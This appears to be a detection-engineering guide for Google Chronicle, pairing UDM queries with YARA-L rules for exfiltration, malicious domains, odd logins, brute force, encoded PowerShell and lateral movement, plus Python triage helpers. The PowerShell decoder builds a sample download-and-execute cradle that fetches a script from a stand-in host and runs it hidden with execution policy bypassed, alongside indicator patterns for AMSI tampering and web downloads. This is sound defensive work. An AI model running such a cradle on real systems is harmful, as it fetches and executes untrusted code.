Having robust and flexible detections is critical for identifying and addressing potential threats. Google Chronicle supports custom detection engineering through two complementary tools: UDM search queries, for hunting and for validating a hypothesis against historical events, and YARA-L 2.0 rules, which run the same logic continuously and raise alerts. Below I outline six Chronicle queries along with six matching rules, each covering a common detection scenario. They are deliberately basic and serve as a framework: tune the fields, reference lists and thresholds to your own telemetry before deploying them. Two conventions apply throughout. Reference lists are addressed with a percent prefix (for example %internal_ip_list) in both search and rules, and in a YARA-L rule the filtering lives in the events section while the condition section comes last and only states which event variables (or how many of them) must be present.
Large Data Transfers to External IPs
Query:
metadata.event_type = "NETWORK_CONNECTION"
AND network.direction = "OUTBOUND"
AND network.sent_bytes > 5000000
AND NOT target.ip IN %internal_ip_list
Rule:
rule data_exfiltration_detection {
  meta:
    author = "SecurityTeam"
    description = "Detects a single outbound connection sending more than 5 MB to an IP that is not on the internal reference list"
    severity = "High"

  events:
    $exfil_event.metadata.event_type = "NETWORK_CONNECTION"
    $exfil_event.network.direction = "OUTBOUND"
    $exfil_event.network.sent_bytes > 5000000
    // reference lists use a % prefix; internal_ip_list holds your own address space
    not $exfil_event.target.ip in %internal_ip_list

  outcome:
    $data_exfil = max($exfil_event.network.sent_bytes)

  condition:
    $exfil_event
}
Note: the UDM field for the destination address is target.ip (there is no target.ip_address), and the byte counter is network.sent_bytes. A per-connection threshold only catches bulk transfers; to catch slow exfiltration, bind the source address to a placeholder, add a match section over that placeholder (for example over 1h) and alert on sum($exfil_event.network.sent_bytes) instead of a single event's size.
Access to Known Malicious Domains
Query:
(metadata.event_type = "NETWORK_CONNECTION" OR metadata.event_type = "NETWORK_HTTP")
AND (target.hostname IN %malicious_domains_list
OR target.ip IN %malicious_ips_list)
Rule:
rule malicious_domain_access {
  meta:
    author = "SecurityTeam"
    description = "Detects connections to hostnames or IP addresses on the malicious reference lists"
    severity = "Critical"

  events:
    ($malicious_conn.metadata.event_type = "NETWORK_CONNECTION" or
     $malicious_conn.metadata.event_type = "NETWORK_HTTP")
    ($malicious_conn.target.hostname in %malicious_domains_list or
     $malicious_conn.target.ip in %malicious_ips_list)

  outcome:
    $access = max(100)

  condition:
    $malicious_conn
}
Note: target.hostname is only populated when the log source records it (proxy and HTTP logs do; raw flow records usually do not), so pair this rule with one over NETWORK_DNS events that matches network.dns.questions.name against the same domain list. The rule is only as good as the lists, so feed them from your threat-intelligence pipeline rather than maintaining them by hand.
Unusual Login Patterns
Query:
metadata.event_type = "USER_LOGIN"
AND security_result.action = "ALLOW"
AND (timestamp.get_hour(metadata.event_timestamp.seconds, "UTC") < 6
OR timestamp.get_hour(metadata.event_timestamp.seconds, "UTC") > 19)
Rule:
rule after_hours_login {
  meta:
    author = "SecurityTeam"
    description = "Detects successful logins outside business hours (06:00 to 19:59) or on weekends"
    severity = "Medium"

  events:
    $login_event.metadata.event_type = "USER_LOGIN"
    // only successful logins; failed after-hours attempts belong in the brute-force rule
    $login_event.security_result.action = "ALLOW"
    // replace "UTC" with the IANA time zone your users actually work in (e.g. "Europe/London");
    // timestamp.get_day_of_week returns 1 for Sunday through 7 for Saturday
    (
      timestamp.get_hour($login_event.metadata.event_timestamp.seconds, "UTC") < 6 or
      timestamp.get_hour($login_event.metadata.event_timestamp.seconds, "UTC") > 19 or
      timestamp.get_day_of_week($login_event.metadata.event_timestamp.seconds, "UTC") = 1 or
      timestamp.get_day_of_week($login_event.metadata.event_timestamp.seconds, "UTC") = 7
    )

  outcome:
    $after_hours_access = max(75)

  condition:
    $login_event
}
Note: a fixed time window assumes one workforce in one time zone; for a distributed organisation, either run one copy of the rule per region or compare against a per-user baseline instead. Service accounts and on-call staff will trip this rule constantly, so exclude them with a reference list on $login_event.target.user.userid.
Multiple Failed Login Attempts Followed by a Successful Login
Query:
metadata.event_type = "USER_LOGIN"
AND (security_result.action = "BLOCK" OR security_result.action = "ALLOW")
AND principal.ip = "203.0.113.5"
UDM search is a filter, not a sequence engine: it has no FOLLOWED BY operator and no windowed count. Use the query above to pull every login outcome for a source address you are investigating (replace 203.0.113.5 with the IP in question) and read the sequence off the results; the rule below does the sequencing automatically.
Rule:
rule potential_bruteforce {
  meta:
    author = "SecurityTeam"
    description = "Detects at least five failed logins from one source IP against one user within five minutes, followed by a successful login for the same pair"
    severity = "High"

  events:
    // failed attempts; UDM uses BLOCK (some parsers emit FAIL) for a rejected login, not DENY
    $fail.metadata.event_type = "USER_LOGIN"
    $fail.security_result.action = "BLOCK"
    $fail.principal.ip = $ip
    $fail.target.user.userid = $user

    // the success that must come after the failures, for the same source and user
    $success.metadata.event_type = "USER_LOGIN"
    $success.security_result.action = "ALLOW"
    $success.principal.ip = $ip
    $success.target.user.userid = $user
    $fail.metadata.event_timestamp.seconds < $success.metadata.event_timestamp.seconds

  match:
    $ip, $user over 5m

  outcome:
    $failed_attempts = count($fail.metadata.event_timestamp.seconds)
    $brute_force_detected = max(90)

  condition:
    #fail >= 5 and $success
}
Note: the single-event form cannot express "followed by", because counts and time windows only exist together with a match section; the version above groups events by source IP and target user and fires once per five-minute window. Password spraying (one IP, many users, one or two attempts each) needs the inverse grouping: match on $ip alone and alert on count_distinct($fail.target.user.userid).
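To check what the brute-force rule will and will not fire on before running it as a retrohunt, it helps to replay the same logic over a handful of events offline. The following is an added example, not code from the original post or from Chronicle: a Python replay of the rule's sequence logic (at least five BLOCKed USER_LOGIN events from one source IP against one user inside a five-minute window, followed by an ALLOW for the same pair). The events are constructed sample data using RFC 5737 documentation addresses and made-up user names, flattened to dotted UDM field names; the window and threshold match the rule and are parameters so the edge cases (too few failures, a success that arrives after the window closes) can be exercised.

```python
"""Offline replay of the brute-force rule over constructed UDM-style login events."""
from collections import defaultdict, deque
from typing import Deque, Dict, List, Tuple

WINDOW_SECONDS = 5 * 60   # the rule's "over 5m" match window
FAILURE_THRESHOLD = 5     # the rule's "#fail >= 5"

T0 = 1_700_000_000        # arbitrary epoch base for the constructed sample


def _login(ts: int, ip: str, user: str, action: str) -> Dict[str, object]:
    """Build a flattened UDM-style USER_LOGIN event (constructed, not real telemetry)."""
    return {
        "metadata.event_type": "USER_LOGIN",
        "metadata.event_timestamp.seconds": T0 + ts,
        "principal.ip": ip,
        "target.user.userid": user,
        "security_result.action": action,
    }


# Constructed sample telemetry: three scenarios plus one event of another type.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    # alice: six BLOCKed attempts in 50 s, then an ALLOW -> should alert
    *[_login(t, "203.0.113.5", "alice", "BLOCK") for t in (0, 10, 20, 30, 40, 50)],
    _login(60, "203.0.113.5", "alice", "ALLOW"),
    # bob: three failures then success -> below threshold, no alert
    *[_login(t, "198.51.100.7", "bob", "BLOCK") for t in (5, 15, 25)],
    _login(35, "198.51.100.7", "bob", "ALLOW"),
    # carol: five failures, but the success comes 15 minutes later -> outside the window
    *[_login(t, "203.0.113.9", "carol", "BLOCK") for t in (0, 1, 2, 3, 4)],
    _login(900, "203.0.113.9", "carol", "ALLOW"),
    # unrelated event type that the rule's events: section filters out
    {"metadata.event_type": "NETWORK_CONNECTION",
     "metadata.event_timestamp.seconds": T0 + 7, "principal.ip": "203.0.113.5"},
]


def detect_bruteforce(events: List[Dict[str, object]],
                      window: int = WINDOW_SECONDS,
                      threshold: int = FAILURE_THRESHOLD) -> List[Dict[str, object]]:
    """Return one detection per (ip, user) pair whose ALLOW is preceded by at least
    `threshold` BLOCKs within `window` seconds. Input may be out of order."""
    # Process in time order so "followed by" is meaningful.
    ordered = sorted(events, key=lambda e: e["metadata.event_timestamp.seconds"])
    failures: Dict[Tuple[str, str], Deque[int]] = defaultdict(deque)
    detections: List[Dict[str, object]] = []

    for ev in ordered:
        if ev.get("metadata.event_type") != "USER_LOGIN":
            continue
        key = (str(ev["principal.ip"]), str(ev["target.user.userid"]))
        ts = int(ev["metadata.event_timestamp.seconds"])
        recent = failures[key]
        # Slide the window: forget failures older than `window` seconds before this event.
        while recent and recent[0] < ts - window:
            recent.popleft()

        action = ev.get("security_result.action")
        if action == "BLOCK":
            recent.append(ts)
        elif action == "ALLOW" and len(recent) >= threshold:
            detections.append({
                "principal.ip": key[0],
                "target.user.userid": key[1],
                "failed_attempts": len(recent),
                "first_failure": recent[0],
                "success_at": ts,
            })
            recent.clear()  # one alert per burst, like one detection per match window
    return detections


if __name__ == "__main__":
    for hit in detect_bruteforce(SAMPLE_EVENTS):
        print(hit)
```

Only alice produces a detection with the defaults; widening the window to 30 minutes also catches carol, and lowering the threshold to three also catches bob, which is exactly the tuning trade-off the rule's match section and condition expose.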
PowerShell with Encoded Commands
Query:
metadata.event_type = "PROCESS_LAUNCH"
AND target.process.command_line = /(^|\s)-e(c|nc|ncodedcommand)?\s/ nocase
Rule:
rule suspicious_command_execution {
  meta:
    author = "SecurityTeam"
    description = "Detects PowerShell launched with an encoded command (-EncodedCommand and its short forms)"
    severity = "High"

  events:
    $command_event.metadata.event_type = "PROCESS_LAUNCH"
    re.regex($command_event.target.process.file.full_path, `(powershell(_ise)?|pwsh)\.exe$`) nocase
    // PowerShell accepts -ec and any unambiguous prefix of -EncodedCommand; the regex
    // covers the forms seen in practice (-e, -ec, -enc, -encodedcommand)
    re.regex($command_event.target.process.command_line, `(^|\s)-e(c|nc|ncodedcommand)?\s`) nocase

  outcome:
    $suspicious_execution = max(100)

  condition:
    $command_event
}
Note: CONTAINS is not a YARA-L operator; substring and pattern matching is done with re.regex (or with = and nocase for exact matches), and the original match on the literal "-EncodedCommand" missed the abbreviated switches that almost every real payload uses. The argument is base64 of a UTF-16LE string, so decode it as such during triage. Some management tooling launches encoded commands legitimately; baseline the parent process (principal.process in PROCESS_LAUNCH events) before raising the severity.
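Once the rule fires, the analyst needs the script, not the base64 blob. The following is an added example, not code from the original post or from Chronicle: a Python triage helper that finds the encoded-command switch the way PowerShell itself resolves it (-ec or any prefix of -EncodedCommand), decodes the payload as base64 of UTF-16LE, and flags a few common post-decoding indicators. The sample command line is constructed here from a typical download-and-execute cradle pointing at the reserved example.invalid domain; the indicator list is illustrative and should be extended from your own cases.

```python
"""Triage helper for encoded PowerShell command lines (constructed sample input)."""
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts -ec plus any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...).
_ENCODED_PARAM = "encodedcommand"

# Indicators searched in the decoded script (case-insensitive). Illustrative, not exhaustive.
SCRIPT_INDICATORS: Dict[str, str] = {
    "invoke-expression": r"\biex\b|invoke-expression",
    "web download": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
    "nested base64": r"frombase64string",
    "amsi tampering": r"amsiutils|amsiinitfailed",
}
# Launcher flag checked on the outer command line (the blob itself contains no whitespace,
# so this pattern cannot accidentally match inside it).
_HIDDEN_WINDOW = re.compile(r"(^|\s)-w(indowstyle)?\s+hidden\b", re.IGNORECASE)


def is_encoded_command_switch(token: str) -> bool:
    """True for -ec and for any prefix of -EncodedCommand, matched case-insensitively."""
    if not token.startswith("-") or len(token) < 2:
        return False
    name = token[1:].lower()
    return name == "ec" or (name.startswith("e") and _ENCODED_PARAM.startswith(name))


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Return the base64 argument that follows the encoded-command switch, or None."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_command_switch(tok):
            return tokens[i + 1].strip("\"'")
    return None


def decode_powershell_payload(blob: str) -> Optional[str]:
    """base64 -> UTF-16LE text, as PowerShell expects. None if the blob is not valid base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def encode_powershell_payload(script: str) -> str:
    """Inverse of decode_powershell_payload; used here only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage(command_line: str) -> Dict[str, object]:
    """Decode an encoded command line and list the indicators found."""
    blob = extract_encoded_command(command_line)
    decoded = decode_powershell_payload(blob) if blob else None
    hits: List[str] = []
    if decoded:
        hits = [name for name, pat in SCRIPT_INDICATORS.items()
                if re.search(pat, decoded, re.IGNORECASE)]
    if _HIDDEN_WINDOW.search(command_line):
        hits.append("hidden window")
    return {"encoded": blob is not None, "decoded": decoded, "indicators": hits}


# Constructed sample (not a real capture): a classic download-and-execute cradle.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_COMMAND_LINE = (
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -w hidden -enc "
    + encode_powershell_payload(SAMPLE_SCRIPT)
)

if __name__ == "__main__":
    print(triage(SAMPLE_COMMAND_LINE))
```

Note that -ExecutionPolicy is rejected by is_encoded_command_switch even though it starts with "e", because it is not a prefix of "encodedcommand"; that is the same disambiguation PowerShell applies, so a detection built on this logic does not fire on ordinary -ExecutionPolicy Bypass launches.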
Suspicious Lateral Movement Detection
Query:
metadata.event_type = "NETWORK_CONNECTION"
AND net.ip_in_range_cidr(principal.ip, "10.0.0.0/8")
AND net.ip_in_range_cidr(target.ip, "10.0.0.0/8")
AND network.sent_bytes > 1000000
AND NOT target.hostname IN %trusted_hosts_list
Rule:
rule suspicious_lateral_movement {
  meta:
    author = "SecurityTeam"
    description = "Detects large host-to-host transfers inside the internal address space to hosts not on the trusted list"
    severity = "Medium"

  events:
    $internal_conn.metadata.event_type = "NETWORK_CONNECTION"
    // UDM network.direction has no INTERNAL value (only INBOUND, OUTBOUND, BROADCAST and
    // UNKNOWN_DIRECTION), so "internal" here means both ends sit in private address space.
    // Adjust the CIDRs to your own ranges; 172.16.0.0/12 is the third RFC 1918 block.
    (net.ip_in_range_cidr($internal_conn.principal.ip, "10.0.0.0/8") or
     net.ip_in_range_cidr($internal_conn.principal.ip, "192.168.0.0/16"))
    (net.ip_in_range_cidr($internal_conn.target.ip, "10.0.0.0/8") or
     net.ip_in_range_cidr($internal_conn.target.ip, "192.168.0.0/16"))
    // the byte counter is network.sent_bytes, not network.bytes_sent
    $internal_conn.network.sent_bytes > 1000000
    not $internal_conn.target.hostname in %trusted_hosts_list

  outcome:
    $lateral_movement_detected = max(85)

  condition:
    $internal_conn
}
Note: byte volume alone is a weak lateral-movement signal, since backups, file shares and patching all move data internally. Stronger variants restrict the rule to remote-administration ports (target.port of 445, 3389, 5985 or 5986) or bind principal.ip to a placeholder, match on it over a window, and alert when count_distinct($internal_conn.target.ip) exceeds the host's normal fan-out.
Conclusion
These queries and rules address several threat scenarios, from large outbound transfers and contact with known-bad infrastructure to after-hours logins, brute-force sequences, encoded PowerShell and internal host-to-host transfers. Before enabling any of them, run the rule as a retrohunt over recent history to size the alert volume, then tailor the reference lists (internal ranges, trusted hosts, excluded service accounts) and the thresholds to your organisation so that what reaches the queue is relevant and actionable.